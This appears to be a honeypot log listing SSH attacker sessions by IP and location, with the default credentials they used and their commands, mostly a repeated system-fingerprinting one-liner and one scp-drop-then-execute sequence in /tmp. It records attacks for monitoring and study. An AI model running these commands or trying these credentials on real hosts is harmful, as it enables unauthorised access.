🎭 monsoon_root_17 (168.144.26.0) — Bengaluru, India · 6 sessions · 24 cmds

2026-03-01 06:31 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 scone_root_19 (134.209.24.124) — Slough, United Kingdom · 4 sessions · 16 cmds

2026-03-01 06:20 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 cowboy_root_19 (167.71.188.167) — Clifton, United States · 2 sessions · 8 cmds

2026-03-01 05:20 EST · as root/12345678, root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 autobahn_root_19 (46.101.246.233) — Frankfurt am Main, Germany · 5 sessions · 20 cmds

2026-03-01 04:56 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 autobahn_sol (185.207.113.182) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-03-01 04:01 EST · as root/1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 monsoon_root_18 (142.93.214.146) — Bengaluru, India · 1 session · 4 cmds

2026-03-01 02:55 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 tulip_root_6 (167.71.9.229) — Amsterdam, Netherlands · 15 sessions · 60 cmds

2026-03-01 01:30 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 15x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×15

$ uname -s -v -n -m 2 > /dev/null ×15

$ uname -m 2 > /dev/null ×15

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×15

🎭 yankee_root_23 (206.189.202.170) — North Bergen, United States · 2 sessions · 8 cmds

2026-03-01 02:41 EST · as root/12345678, root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 tiger_root_13 (68.183.92.174) — Bengaluru, India · 1 session · 4 cmds

2026-03-01 02:19 EST · as pi/raspberry

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 roo_root_6 (134.199.159.216) — Sydney, Australia · 3 sessions · 12 cmds

2026-03-01 02:14 EST · as admin/password, root/12345678, root/qwerty

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 yankee_root (87.121.84.72) — Chicago, United States · 22 sessions · 88 cmds

2026-02-28 05:44 EST · as admin/123456, admin/admin, mysql/mysql

echo → core count check → grep → OS/kernel identification (repeated echo 25x)

$ echo "[out $(nproc) $(grep "model name" /proc/cpuinfo | uniq | cut -d":" -f2 | xargs) || $(uname -a)]" ×22

$ nproc ×22

↳ core count check

$ grep model name /proc/cpuinfo | uniq | cut -d: -f2 | xargs ×22

$ uname -a ×22

↳ OS/kernel identification

🎭 strudel_root_3 (209.38.192.24) — Frankfurt am Main, Germany · 19 sessions · 76 cmds

2026-03-01 00:25 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 19x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×19

$ uname -s -v -n -m 2 > /dev/null ×19

$ uname -m 2 > /dev/null ×19

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×19

🎭 cipher_pi_3 (125.227.156.55) — Taipei, Taiwan · 2 sessions · 3 cmds

2026-03-01 00:24 EST · as pi/raspberry

make executable → execute payload → execute from /tmp

$ cd /tmp && chmod +x 6KfbTAQ9 && bash -c ./6KfbTAQ9

↳ make executable

$ ./6KfbTAQ9

↳ execute payload

$ scp -t /tmp/6KfbTAQ9

↳ execute from /tmp

🎭 tiger_root_14 (64.227.140.175) — Bengaluru, India · 9 sessions · 36 cmds

2026-02-28 23:11 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 9x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×9

$ uname -s -v -n -m 2 > /dev/null ×9

$ uname -m 2 > /dev/null ×9

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×9

🎭 spice_root_20 (143.110.247.200) — Bengaluru, India · 5 sessions · 20 cmds

2026-02-28 23:04 EST · as admin/admin, root/admin, root/admin123

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 chai_root_15 (143.244.143.247) — Bengaluru, India · 2 sessions · 8 cmds

2026-02-28 23:11 EST · as root/1234, root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 chai_root_16 (206.189.142.135) — Bengaluru, India · 6 sessions · 24 cmds

2026-02-28 23:04 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 eagle_root_3 (162.243.122.39) — Secaucus, United States · 10 sessions · 40 cmds

2026-02-28 21:27 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 10x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 moose_root_2 (167.99.189.246) — Toronto, Canada · 10 sessions · 40 cmds

2026-02-28 21:29 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 10x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 ghost_root_6 (68.183.232.71) — Singapore, Singapore · 19 sessions · 76 cmds

2026-02-28 20:10 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 19x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×19

$ uname -s -v -n -m 2 > /dev/null ×19

$ uname -m 2 > /dev/null ×19

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×19

